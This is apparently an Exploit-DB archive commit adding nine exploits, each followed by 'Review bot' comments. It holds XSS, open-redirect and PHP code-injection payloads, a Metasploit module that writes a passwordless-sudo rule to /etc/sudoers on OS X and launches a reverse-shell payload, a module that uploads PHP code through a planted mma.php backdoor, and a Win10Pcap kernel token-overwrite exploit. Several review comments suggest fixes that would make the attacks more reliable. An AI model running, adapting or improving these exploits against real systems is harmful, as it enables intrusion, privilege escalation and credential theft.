DB: 2015-10-28

9 new exploits
This commit is contained in:
Offensive Security 2015-10-28 05:03:06 +00:00
parent d0e0fe5941
commit 8a009f2fce
10 changed files with 615 additions and 0 deletions


@ -34686,6 +34686,8 @@ id,file,description,date,author,platform,type,port
38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin Cross Site Request Forgery Vulnerability",2013-03-19,m3tamantra,php,webapps,0
38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard '.PLF' File Remote Buffer Overflow Vulnerability",2013-03-19,metacom,windows,remote,0
38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080
38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 'returnTo' Parameter Open Redirection Vulnerability",2013-05-27,"Chokri Ben Achor",hardware,remote,0
38537,platforms/php/webapps/38537.txt,"WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross Site Scripting Vulnerability",2013-05-27,k3170makan,php,webapps,0
38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0
38400,platforms/php/webapps/38400.txt,"AlienVault OSSIM 4.3 - CSRF Vulnerabilities",2015-10-05,"MohamadReza Mohajerani",php,webapps,0
38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0
@ -34810,3 +34812,10 @@ id,file,description,date,author,platform,type,port
38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0
38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0
38538,platforms/multiple/dos/38538.py,"Code::Blocks Denial of Service Vulnerability",2013-05-29,ariarat,multiple,dos,0
38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-27,metasploit,osx,local,0
38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,metasploit,php,remote,80
38542,platforms/windows/dos/38542.cpp,"Win10Pcap - Local Privilege Escalation Vulnerability",2015-10-27,R00tkitSMM,windows,dos,0
38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection Vulnerability",2012-05-31,"CWH Underground",php,webapps,0
38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0
38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross Site Scripting Vulnerability",2013-06-04,"Manuel García Cárdenas",php,webapps,0


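--- a/platforms/hardware/remote/38536.txt
+++ b/platforms/hardware/remote/38536.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/60172/info
+Barracuda SSL VPN 680 is prone to an open-redirection vulnerability.
+An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
+Barracuda SSL VPN 680 2.2.2.203 is vulnerable; other versions may also be affected.
+https://www.example.com/launchApplication.do?resourceId=1&policy=1&returnTo=%2FshowApplicationShortcuts.do
+https://www.exmaple.com/launchApplication.do?resourceId=1&policy=1&returnTo=http://www.example.com
+https://www.exmaple.com/[FILE].do?[RES+ID]=x&[POLICY]=x&returnTo=[EXTERNAL TARGET]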
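Review bot: The second and third PoC URLs use the host `www.exmaple.com` while the first uses `www.example.com`; this looks like a typo and should read `https://www.example.com/launchApplication.do?resourceId=1&policy=1&returnTo=http://www.example.com` so a reader does not take the misspelling for part of the test. The text never states what a positive result looks like; a sentence such as `a redirect response whose Location header carries the returnTo value unchanged confirms the issue` (presumably what the PoC relies on) would make it verifiable. A remediation hint is also missing — accept only relative paths for returnTo, or validate its host against an allow-list.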

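--- a/platforms/multiple/dos/38538.py
+++ b/platforms/multiple/dos/38538.py
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/60208/info
+Code::Blocks is prone to a denial-of-service vulnerability.
+An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed.
+Code::Blocks 12.11 is vulnerable; other versions may also be affected.
+#!/usr/bin/python
+filename="string.txt"
+buffer = "\x41" * 1000
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()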
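Review bot: The script writes 1000 'A' bytes to string.txt but never says how Code::Blocks is expected to consume that file, so the crash cannot be reproduced from the listing alone; a comment such as `# open string.txt in Code::Blocks 12.11 through the input path described in BID 60208` would tie the generator to the trigger. The handle is closed by hand; `with open(filename, 'w') as textfile: textfile.write(buffer)` releases it even when the write raises. Nothing in the file supports the "arbitrary code execution may be possible" wording beyond a fixed 1000-byte buffer, so that claim should stay hedged as it is.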

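--- a/platforms/osx/local/38540.rb
+++ b/platforms/osx/local/38540.rb
@@ -0,0 +1,215 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit4 < Msf::Exploit::Local
+Rank = NormalRanking
+include Msf::Post::OSX::System
+include Msf::Exploit::EXE
+include Msf::Exploit::FileDropper
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',
+'Description' => %q{
+This module writes to the sudoers file without root access by exploiting rsh and malloc log files.
+Makes sudo require no password, giving access to su even if root is disabled.
+Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).
+},
+'Author' => [
+'rebel', # Vulnerability discovery and PoC
+'shandelman116' # Copy/paste AND translator monkey
+],
+'References' => [
+['EDB', '38371'],
+['CVE', '2015-5889']
+],
+'DisclosureDate' => 'Oct 1 2015',
+'License' => MSF_LICENSE,
+# Want to ensure that this can be used on Python Meterpreter sessions as well
+'Platform' => ['osx', 'python'],
+'Arch' => [ARCH_X86_64, ARCH_PYTHON],
+'SessionTypes' => ['shell', 'meterpreter'],
+'Privileged' => true,
+'Targets' => [
+['Mac OS X 10.9.5-10.10.5', {}]
+],
+'DefaultTarget' => 0,
+'DefaultOptions' => {
+'PAYLOAD' => 'osx/x64/shell_reverse_tcp'
+}
+))
+register_options(
+[
+OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),
+OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+], self.class
+)
+end
+def exploit
+# Check OS
+os_check
+# Check if crontab file existed already so it can be restored at cleanup
+if file_exist? "/etc/crontab"
+@crontab_original = read_file("/etc/crontab")
+else
+@crontab_original = nil
+end
+# Writing payload
+if payload.arch.include? ARCH_X86_64
+vprint_status("Writing payload to #{payload_file}.")
+write_file(payload_file, payload_source)
+vprint_status("Finished writing payload file.")
+register_file_for_cleanup(payload_file)
+elsif payload.arch.include? ARCH_PYTHON
+vprint_status("No need to write payload. Will simply execute after exploit")
+vprint_status("Payload encodeded is #{payload.encoded}")
+end
+# Run exploit
+sploit
+# Execute payload
+print_status('Executing payload...')
+if payload.arch.include? ARCH_X86_64
+cmd_exec("chmod +x #{payload_file}; #{payload_file} & disown")
+elsif payload.arch.include? ARCH_PYTHON
+cmd_exec("python -c \"#{payload.encoded}\" & disown")
+end
+vprint_status("Finished executing payload.")
+end
+def os_check
+# Get sysinfo
+sysinfo = get_sysinfo
+# Make sure its OS X (Darwin)
+unless sysinfo["Kernel"].include? "Darwin"
+print_warning("The target system does not appear to be running OS X!")
+print_warning("Kernel information: #{sysinfo['Kernel']}")
+return
+end
+# Make sure its not greater than 10.5 or less than 9.5
+version = sysinfo["ProductVersion"]
+minor_version = version[3...version.length].to_f
+unless minor_version >= 9.5 && minor_version <= 10.5
+print_warning("The target version of OS X does not appear to be compatible with the exploit!")
+print_warning("Target is running OS X #{sysinfo['ProductVersion']}")
+end
+end
+def sploit
+user = cmd_exec("whoami").chomp
+vprint_status("The current effective user is #{user}. Starting the sploit")
+# Get size of sudoers file
+sudoer_path = "/etc/sudoers"
+size = get_stat_size(sudoer_path)
+# Set up the environment and command for spawning rsh and writing to crontab file
+rb_script = "e={\"MallocLogFile\"=>\"/etc/crontab\",\"MallocStackLogging\"=>\"yes\",\"MallocStackLoggingDirectory\"=>\"a\n* * * * * root echo \\\"ALL ALL=(ALL) NOPASSWD: ALL\\\" >> /etc/sudoers\n\n\n\n\n\"}; Process.spawn(e,[\"/usr/bin/rsh\",\"rsh\"],\"localhost\",[:out, :err]=>\"/dev/null\")"
+rb_cmd = "ruby -e '#{rb_script}'"
+# Attempt to execute
+print_status("Attempting to write /etc/crontab...")
+cmd_exec(rb_cmd)
+vprint_status("Now to check whether the script worked...")
+# Check whether it worked
+crontab = cmd_exec("cat /etc/crontab")
+vprint_status("Reading crontab yielded the following response: #{crontab}")
+unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
+vprint_error("Bad news... it did not write to the file.")
+fail_with(Failure::NotVulnerable, "Could not successfully write to crontab file.")
+end
+print_good("Succesfully wrote to crontab file!")
+# Wait for sudoers to change
+new_size = get_stat_size(sudoer_path)
+print_status("Waiting for sudoers file to change...")
+# Start timeout block
+begin
+Timeout.timeout(datastore['WaitTime']) {
+while new_size <= size
+Rex.sleep(1)
+new_size = get_stat_size(sudoer_path)
+end
+}
+rescue Timeout::Error
+fail_with(Failure::TimeoutExpired, "Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.")
+end
+print_good("Sudoers file has changed!")
+# Confirming root access
+print_status("Attempting to start root shell...")
+cmd_exec("sudo -s su")
+user = cmd_exec("whoami")
+unless user.include? "root"
+fail_with(Failure::UnexpectedReply, "Unable to acquire root access. Whoami returned: #{user}")
+end
+print_good("Success! Acquired root access!")
+end
+def get_stat_size(file_path)
+cmd = "env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'"
+response = cmd_exec(cmd)
+vprint_status("Response to stat size query is #{response}")
+begin
+size = Integer(response)
+return size
+rescue ArgumentError
+fail_with(Failure::UnexpectedReply, "Could not get stat size!")
+end
+end
+def payload_source
+if payload.arch.include? ARCH_X86_64
+return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+elsif payload.arch.include? ARCH_PYTHON
+return payload.encoded
+end
+end
+def payload_file
+@payload_file ||=
+"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+end
+def cleanup
+vprint_status("Starting the cron restore process...")
+super
+# Restore crontab back to is original state
+# If we don't do this, then cron will continue to append the no password rule to sudoers.
+if @crontab_original.nil?
+# Erase crontab file and kill cron process since it did not exist before
+vprint_status("Killing cron process and removing crontab file since it did not exist prior to exploit.")
+rm_ret = cmd_exec("rm /etc/crontab 2>/dev/null; echo $?")
+if rm_ret.chomp.to_i == 0
+vprint_good("Successfully removed crontab file!")
+else
+print_warning("Could not remove crontab file.")
+end
+Rex.sleep(1)
+kill_ret = cmd_exec("killall cron 2>/dev/null; echo $?")
+if kill_ret.chomp.to_i == 0
+vprint_good("Succesfully killed cron!")
+else
+print_warning("Could not kill cron process.")
+end
+else
+# Write back the original content of crontab
+vprint_status("Restoring crontab file back to original contents. No need for it anymore.")
+cmd_exec("echo '#{@crontab_original}' > /etc/crontab")
+end
+vprint_status("Finished the cleanup process.")
+end
+end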
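Review bot: os_check only prints warnings and returns when the kernel is not Darwin or the version falls outside 10.9.5–10.10.5, so exploit goes on to spawn rsh and rewrite /etc/crontab on an unsupported host; both warning paths should abort instead, e.g. `fail_with(Failure::NoTarget, "Target does not appear to be OS X 10.9.5-10.10.5 (#{sysinfo['ProductVersion']})")`. cleanup restores or removes /etc/crontab but never removes the `ALL ALL=(ALL) NOPASSWD: ALL` line that the cron job appended to /etc/sudoers, so every user on the host keeps passwordless sudo after the session ends — at minimum the Description should say so, and since the module has root by then it could strip that line in cleanup. The crontab restore shells out with `echo '#{@crontab_original}' > /etc/crontab`, which breaks on any single quote in the original content; `write_file("/etc/crontab", @crontab_original)`, already used for the payload, avoids the quoting problem.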

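--- a/platforms/php/remote/38541.rb
+++ b/platforms/php/remote/38541.rb
@@ -0,0 +1,111 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+require 'nokogiri'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::FileDropper
+def initialize(info={})
+super(update_info(info,
+'Name' => 'Th3 MMA mma.php Backdoor Arbitrary File Upload',
+'Description' => %q{
+This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that
+leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or
+operating system version because of the php_uname() function.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Jay Turla <@shipcod3>',
+],
+'References' =>
+[
+['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor
+],
+'Privileged' => false,
+'Payload' =>
+{
+'Space' => 10000,
+'DisableNops' => true
+},
+'Platform' => 'php',
+'Arch' => ARCH_PHP,
+'Targets' =>
+[
+['mma file uploader', {} ]
+],
+'DisclosureDate' => 'Apr 2 2012',
+'DefaultTarget' => 0))
+register_options(
+[
+OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]),
+],self.class) # sometimes it is under host/images/mma.php so you may want to set this one
+end
+def has_input_name?(nodes, name)
+nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true
+end
+def check
+uri = normalize_uri(target_uri.path)
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => uri
+})
+if res
+n = ::Nokogiri::HTML(res.body)
+form = n.at('form[@id="uploader"]')
+inputs = form.search('input')
+if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl')
+return Exploit::CheckCode::Appears
+end
+end
+Exploit::CheckCode::Safe
+end
+def exploit
+uri = normalize_uri(target_uri.path)
+payload_name = "#{rand_text_alpha(5)}.php"
+print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor")
+data = Rex::MIME::Message.new
+data.add_part('Upload', nil, nil, 'form-data; name="_upl"')
+data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
+post_data = data.to_s
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => uri,
+'ctype' => "multipart/form-data; boundary=#{data.bound}",
+'data' => post_data
+})
+if res
+if res.body =~ /uplod d0n3 in SAME file/
+print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...")
+register_files_for_cleanup(payload_name)
+else
+fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+end
+else
+fail_with(Failure::Unknown, 'Connection Timed Out')
+end
+send_request_cgi({
+'uri' => normalize_uri(payload_name),
+'method' => 'GET'
+})
+end
+end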
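Review bot: check dereferences `form` without testing it, so any host that answers with HTML lacking a `form[@id="uploader"]` element raises NoMethodError on `form.search('input')` instead of returning CheckCode::Safe; add `return Exploit::CheckCode::Safe unless form` before the search. has_input_name? has the same shape of problem — `e.attributes['name'].value` raises on an input with no name attribute — and reads better as `nodes.any? { |e| e['name'] == name }`. In exploit the uploaded file is fetched at `normalize_uri(payload_name)`, i.e. the web root, while the backdoor's "SAME file" reply and the comment about host/images/mma.php suggest it lands next to mma.php; `normalize_uri(File.dirname(target_uri.path), payload_name)` would follow TARGETURI — worth confirming against the backdoor source before changing.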

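--- a/platforms/php/webapps/38537.txt
+++ b/platforms/php/webapps/38537.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60198/info
+ADIF Log Search widget plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ADIF Log Search 1.0e is vulnerable; other versions may also be affected.
+http://www.example.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://www.example2.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E>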
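Review bot: The PoC line ends with `<http://www.example2.com/wordpress/?call=...>`, a second copy of the same URL in angle brackets that looks like a mail-client autolink artifact rather than a second injection point; dropping it leaves one clean URL: `http://www.example.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E`. The text never names the script that reflects `call` — the index entry for this file calls it logbook_search.php — so a line such as `Vulnerable parameter: call (logbook_search.php)` would tie the PoC to the component.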

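--- a/platforms/php/webapps/38543.txt
+++ b/platforms/php/webapps/38543.txt
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/60257/info
+php4dvd is prone to a remote PHP code-injection vulnerability.
+An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+php4dvd 2.0 is vulnerable; other versions may also be affected.
+POST /php4dvd/install/?go=configuration HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://www.example.com/php4dvd/install/?go=configuration
+Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=9bucpus4ag68733h2fjpm190p0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 130
+dbhost=localhost&dbport=3306;phpinfo()&dbname=php4dvd&dbuser=root&dbpass=myP@ssw0rd&url=php4dvd&template=default&defaultlanguage=en_US&submit=Next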
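Review bot: The request carries what looks like a live `PHPSESSID` and Google Analytics `__utma`/`__utmz` cookies; they add nothing to the PoC and should be scrubbed to placeholders, e.g. `Cookie: lang=en_US; PHPSESSID=[SESSION]`, before publication. `Content-Length: 130` does not match the body as printed (146 bytes), and `Host: localhost` disagrees with the `www.example.com` Referer, so the request will not replay as-is; either correct the header or note that the length must be re-measured. The injection point is `dbport=3306;phpinfo()`, but the advisory does not say where the value ends up (presumably a generated config.php, per the index title) or that the installer must still be reachable — one sentence on that precondition would help a tester.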

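--- a/platforms/php/webapps/38544.txt
+++ b/platforms/php/webapps/38544.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/60262/info
+Elastix is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+https://www.example.com/libs/jpgraph/Examples/bar_csimex3.php/"><IMg srC= x OnerRoR = alert(1337)>
+https://www.example.comlibs/magpierss/scripts/magpie_simple.php?url="><IMg+srC%3D+x+OnerRoR+%3D+alert(1337)>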
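Review bot: The second PoC URL is missing the slash after the host — `https://www.example.comlibs/magpierss/...` should read `https://www.example.com/libs/magpierss/scripts/magpie_simple.php?url=...`. The two vectors differ in kind (the first injects through the path after bar_csimex3.php, the second through the `url` parameter), and naming each injection point in a short line would make that clear. Unlike the other advisories in this commit, the text gives no affected Elastix version; if the source advisory states one it should be carried over.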

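--- a/platforms/php/webapps/38545.txt
+++ b/platforms/php/webapps/38545.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60288/info
+Telaen is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+Versions prior to Telaen 1.3.1 are vulnerable.
+http://www.example.com/telaen/index.php?tid=default&lid=en_UK&f_email="><script>alert("XSS")</script>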
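Review bot: The text says versions prior to Telaen 1.3.1 are vulnerable, while the index entry for this file titles it `Telaen 2.7.x`; one of the two is wrong and a reader cannot tell which from the file, so the version line should be reconciled with the source advisory. The PoC itself is usable, but a note on where `f_email` is reflected (index.php is the only hint given) would tell a tester what to look for.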

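--- a/platforms/windows/dos/38542.cpp
+++ b/platforms/windows/dos/38542.cpp
@@ -0,0 +1,205 @@
+# Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
+/*
+Win10Pcap kernel-mode driver did not check the virtual addresses which are passed from the user-mode , IOCTL Using Neither Buffered Nor Direct I/O without ProbeForWrite to validating passed address
+you need find accurate Device name in runtime to send IOCTL , hardcoded device name dont lead to vulnerable code
+IOCTL handller write a string in passed address , string is something like "Global\WTCAP_EVENT_3889023063_1"
+ther was many way to exploit this vulnerability i decide to set privilege in process TOKEN with overwriting _SEP_TOKEN_PRIVILEGES
+overwriting token at address 0x034 with string "Global\WTCAP_EVENT" can set SeDebugPrivilege without corrupting sensitive Filds
+*/
+#include <stdio.h>
+#include <tchar.h>
+#include<Windows.h>
+#include<stdio.h>
+#include <winternl.h>
+#include <intrin.h>
+#include <psapi.h>
+#include <strsafe.h>
+#include <assert.h>
+#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
+#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
+/* found with :
+!token
+1: kd> dt nt!_OBJECT_HEADER
++0x000 PointerCount : Int4B
++0x004 HandleCount : Int4B
++0x004 NextToFree : Ptr32 Void
++0x008 Lock : _EX_PUSH_LOCK
++0x00c TypeIndex : UChar
++0x00d TraceFlags : UChar
++0x00e InfoMask : UChar
++0x00f Flags : UChar
++0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
++0x010 QuotaBlockCharged : Ptr32 Void
++0x014 SecurityDescriptor : Ptr32 Void
++0x018 Body : _QUAD
+TypeIndex is 0x5
+*/
+#define HANDLE_TYPE_TOKEN 0x5
+// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
+const SYSTEM_INFORMATION_CLASS SystemHandleInformation =
+(SYSTEM_INFORMATION_CLASS)16;
+// The NtQuerySystemInformation function and the structures that it returns
+// are internal to the operating system and subject to change from one
+// release of Windows to another. To maintain the compatibility of your
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
+IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
+OUT PVOID SystemInformation,
+IN ULONG SystemInformationLength,
+OUT PULONG ReturnLength OPTIONAL
+);
+// Undocumented structure: SYSTEM_HANDLE_INFORMATION
+typedef struct _SYSTEM_HANDLE
+{
+ULONG ProcessId;
+UCHAR ObjectTypeNumber;
+UCHAR Flags;
+USHORT Handle;
+PVOID Object;
+ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
+typedef struct _SYSTEM_HANDLE_INFORMATION
+{
+ULONG NumberOfHandles;
+SYSTEM_HANDLE Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
+const FILE_INFORMATION_CLASS FileNameInformation =
+(FILE_INFORMATION_CLASS)9;
+// The NtQueryInformationFile function and the structures that it returns
+// are internal to the operating system and subject to change from one
+// release of Windows to another. To maintain the compatibility of your
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
+IN HANDLE FileHandle,
+OUT PIO_STATUS_BLOCK IoStatusBlock,
+OUT PVOID FileInformation,
+IN ULONG Length,
+IN FILE_INFORMATION_CLASS FileInformationClass
+);
+// FILE_NAME_INFORMATION contains name of queried file object.
+typedef struct _FILE_NAME_INFORMATION {
+ULONG FileNameLength;
+WCHAR FileName[1];
+} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
+void* FindTokenAddressHandles(ULONG pid)
+{
+/////////////////////////////////////////////////////////////////////////
+// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
+//
+// The functions have no associated import library. You must use the
+// LoadLibrary and GetProcAddress functions to dynamically link to
+// ntdll.dll.
+HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
+assert(hNtDll != NULL);
+PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
+(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,
+"NtQuerySystemInformation");
+assert(NtQuerySystemInformation != NULL);
+/////////////////////////////////////////////////////////////////////////
+// Get system handle information.
+//
+DWORD nSize = 4096, nReturn;
+PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
+HeapAlloc(GetProcessHeap(), 0, nSize);
+// NtQuerySystemInformation does not return the correct required buffer
+// size if the buffer passed is too small. Instead you must call the
+// function while increasing the buffer size until the function no longer
+// returns STATUS_INFO_LENGTH_MISMATCH.
+while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
+nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
+{
+HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+nSize += 4096;
+pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
+GetProcessHeap(), 0, nSize);
+}
+for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
+{
+PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
+if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
+{
+printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
+return pHandle->Object;
+}
+}
+/////////////////////////////////////////////////////////////////////////
+// Clean up.
+//
+HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+return 0;
+}
+void main()
+{
+DWORD dwBytesReturned;
+DWORD ShellcodeFakeMemory;
+HANDLE token;
+// first create toke handle so find object address with handle
+if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
+DebugBreak();
+void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
+CloseHandle(token);
+// i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)
+HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
+if(hDriver!=INVALID_HANDLE_VALUE)
+{
+fprintf(stderr," Open Driver OK\n");
+if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
+{
+fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
+return;
+}
+else fprintf(stderr," Send IOCTL OK\n");
+}
+else
+{
+fprintf(stderr," Open Driver error %d.\n",GetLastError());
+return;
+}
+CloseHandle(hDriver);
+getchar();
+}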
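Review bot: FindTokenAddressHandles returns 0 when no token handle for the pid is found, and its retry loop also stops on any NTSTATUS other than STATUS_INFO_LENGTH_MISMATCH and then indexes the buffer regardless, yet main hands `(char*)TokenAddress+0x34` straight to DeviceIoControl, so on that path the driver writes the event-name string to kernel address 0x34 and takes the machine down; add `if (!TokenAddress) { fprintf(stderr, "token object not found\n"); return; }` after the lookup and check the final query status before walking Handles. The `return pHandle->Object` inside the loop skips the HeapFree, and `void main()` should be `int main(void)`. The header comment says a hard-coded device name does not reach the vulnerable code, while main opens the hard-coded `\\.\WTCAP_A_{...}` name; a comment at the CreateFileA call stating that the GUID must be discovered at runtime (as the inline remark already implies) would keep the two consistent.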